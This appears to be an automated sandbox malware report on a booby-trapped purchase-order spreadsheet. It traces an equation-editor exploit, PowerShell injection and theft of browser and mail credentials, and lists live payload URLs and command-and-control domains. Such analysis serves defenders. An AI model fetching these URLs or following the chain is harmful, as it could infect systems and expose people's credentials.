MS 20->53 dropped 55 ~WRF{5C909DDB-F3E7...1-100901A3378E}.tmp, Composite 20->55 dropped 57 C:\Users\user\AppData\Local\...\1288490C.doc, Rich 20->57 dropped 91 Microsoft Office launches external ms-search protocol handler (WebDAV) 20->91 93 Office viewer loads remote template 20->93 95 Microsoft Office drops suspicious files 20->95 27 EQNEDT32.EXE 12 20->27         started        file9 signatures10 process11 file12 113 Suspicious powershell command line found 24->113 115 Suspicious execution chain found 24->115 30 powershell.exe 12 4 24->30         started        61 C:\Users\...\mekissedbutterburnwithstrong.vBS, Unicode 27->61 dropped 117 Office equation editor establishes network connection 27->117 119 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 27->119 signatures13 process14 dnsIp15 83 ia803104.us.archive.org 207.241.232.154, 443, 49171 INTERNET-ARCHIVEUS United States 30->83 133 Writes to foreign memory regions 30->133 135 Injects a PE file into a foreign processes 30->135 34 RegAsm.exe 30->34         started        signatures16 process17 signatures18 99 Maps a DLL or memory area into another process 34->99 37 wfbjvizcWo.exe 34->37 injected process19 signatures20 109 Maps a DLL or memory area into another process 37->109 111 Found direct / indirect Syscall (likely to bypass EDR) 37->111 40 find.exe 1 20 37->40         started        process21 dnsIp22 71 www.sqlite.org 45.33.6.223, 49174, 80 LINODE-APLinodeLLCUS United States 40->71 59 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 40->59 dropped 121 Tries to steal Mail credentials (via file / registry access) 40->121 123 Tries to harvest and steal browser information (history, passwords, etc) 40->123 125 Maps a DLL or memory area into another process 40->125 127 Queues an APC in another process (thread injection) 40->127 45 wfbjvizcWo.exe 40->45 injected 49 firefox.exe 40->49         started        file23 signatures24 process25 dnsIp26 77 www.kcrkimya.xyz 45->77 79 www.2886080.xyz 45->79 81 6 other IPs or domains 45->81 129 Found direct / indirect Syscall (likely to bypass EDR) 45->129 signatures27 131 Performs DNS queries to domains with low reputation 79->131

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Mac Purchase Order PO102935.xls9%VirustotalBrowse
            Mac Purchase Order PO102935.xls100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.gymuniversity.net0%VirustotalBrowse
            jiourl.com0%VirustotalBrowse
            ia803104.us.archive.org1%VirustotalBrowse
            www.sqlite.org0%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.jnnotary.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://www.2886080.xyz/template/news/lvse/skin/html/css/style.css0%Avira URL Cloudsafe
            http://www.2886080.xyz/chaomeihuixiang/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.js0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://contoso.com/0%URL Reputationsafe
            http://www.gymuniversity.net/rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L460%Avira URL Cloudsafe
            http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFj0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/800f099199.html0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFj9%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/9053100.jpg0%Avira URL Cloudsafe
            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip0%Avira URL Cloudsafe
            http://www.2886080.xyz/template/news/lvse/skin/html/images/img17.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/2/0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            http://www.2886080.xyz/uploads/images/5046830.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/6014650.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/814d06199124.html0%Avira URL Cloudsafe
            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip0%VirustotalBrowse
            http://www.2886080.xyz/template/news/lvse/skin/js/config.js0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/2/1%VirustotalBrowse
            http://www.2886080.xyz/uploads/images/4905490.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/8693410.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/734e06199204.html0%Avira URL Cloudsafe
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%Avira URL Cloudmalware
            http://www.2886080.xyz/dongyuefeng/3/0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/318d06199620.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/030d06199908.html0%Avira URL Cloudsafe
            http://www.gymuniversity.net/rvs7/0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/3/1%VirustotalBrowse
            http://www.gymuniversity.net/rvs7/0%VirustotalBrowse
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg11%VirustotalBrowse
            http://www.2886080.xyz/longzeluola/0%Avira URL Cloudsafe
            http://192.210.150.33/143/WRG.txt0%Avira URL Cloudsafe
            https://twitter.com/hover0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/328c06199610.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/409b699584.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/longzeluola/1%VirustotalBrowse
            http://www.2886080.xyz/uploads/images/8015020.jpg0%Avira URL Cloudsafe
            https://jiourl.com/0%Avira URL Cloudsafe
            https://twitter.com/hover0%VirustotalBrowse
            http://192.210.150.33/143/WRG.txt9%VirustotalBrowse
            http://www.2886080.xyz/Friends/081b06199857.html0%Avira URL Cloudsafe
            http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/1198420.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/546f06199392.html0%Avira URL Cloudsafe
            https://jiourl.com/0%VirustotalBrowse
            http://www.2886080.xyz/template/news/lvse/skin/html/js/common.js0%Avira URL Cloudsafe
            http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc9%VirustotalBrowse
            http://www.2886080.xyz/dongyuefeng/8/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.kcrkimya.xyz0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/477d06199461.html0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/8/1%VirustotalBrowse
            http://www.2886080.xyz/julisha/0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/254f06199684.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/xiaoxiyou/0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/3038130.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/451c06199487.html0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%VirustotalBrowse
            http://www.2886080.xyz/uploads/images/5835120.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/04f06199934.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/365f06199573.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/10/0%Avira URL Cloudsafe
            http://www.2886080.xyz/template/news/lvse/skin/html/images/qr1.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/70b099929.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/baishimolinai/0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/4025030.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/9/0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/7726870.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/246f699747.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/3087620.jpg0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/343b06199595.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/516e06199422.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/850c06199088.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/996a06198942.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/1/0%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/6496300.jpg0%Avira URL Cloudsafe
            http://www.kcrkimya.xyz/jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L460%Avira URL Cloudsafe
            http://www.2886080.xyz/uploads/images/5580300.jpg0%Avira URL Cloudsafe
            https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
            http://www.2886080.xyz/dongyuefeng/10/1%VirustotalBrowse
            http://www.2886080.xyz/dongyuefeng/9/1%VirustotalBrowse
            http://www.2886080.xyz/uploads/images/8904020.jpg0%Avira URL Cloudsafe
            https://ia803104.us.archive.org0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/544c06199394.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/284f06199654.html0%Avira URL Cloudsafe
            http://www.2886080.xyz/Friends/338e699655.html0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.gymuniversity.net
            		216.40.34.41
            		truefalseunknown
            jiourl.com
            		188.114.97.3
            		truetrueunknown
            www.magicface.shop
            		76.223.54.146
            		truefalse
              		unknown
              www.2886080.xyz
              		103.249.106.91
              		truetrue
                		unknown
                ia803104.us.archive.org
                		207.241.232.154
                		truetrueunknown
                www.sqlite.org
                		45.33.6.223
                		truefalseunknown
                natroredirect.natrocdn.com
                		85.159.66.93
                		truefalseunknown
                www.kcrkimya.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.jnnotary.org
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.gymuniversity.net/rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L46false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zipfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.gymuniversity.net/rvs7/false
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.210.150.33/143/WRG.txttrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doctrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.kcrkimya.xyz/jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L46false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/weeg/?o4=jn1L46&wxW=+t9vfnkbYU1QJIfziniMQm4D0SJKDGsGeZHR+z4AZEyX1J3gptrY73VQNNQ/+mGIVtW5Aqaflf0RAZz5+q7KDi1WF5zu290DE+JeXwSEBwj5ukFt81bZJ4VTl/P9false
                  • Avira URL Cloud: safe
                  		unknown
                  https://jiourl.com/GmwgTsfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabfind.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/chaomeihuixiang/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/css/style.cssfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFjEQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/800f099199.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/9053100.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/images/img17.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/2/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/5046830.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/6014650.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/814d06199124.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/js/config.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/4905490.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/8693410.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/734e06199204.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/3/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/318d06199620.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/030d06199908.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.450023886.0000000002411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.444696114.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/longzeluola/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.com/hoverfind.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/328c06199610.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/409b699584.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/8015020.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://jiourl.com/jiourl.com.url.3.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/081b06199857.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.2886080.xyz/Friends/546f06199392.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/1198420.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/js/common.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/dongyuefeng/8/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.kcrkimya.xyzwfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/477d06199461.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/favicon.ico2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/julisha/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/254f06199684.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/xiaoxiyou/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/uploads/images/3038130.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.2886080.xyz/Friends/451c06199487.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
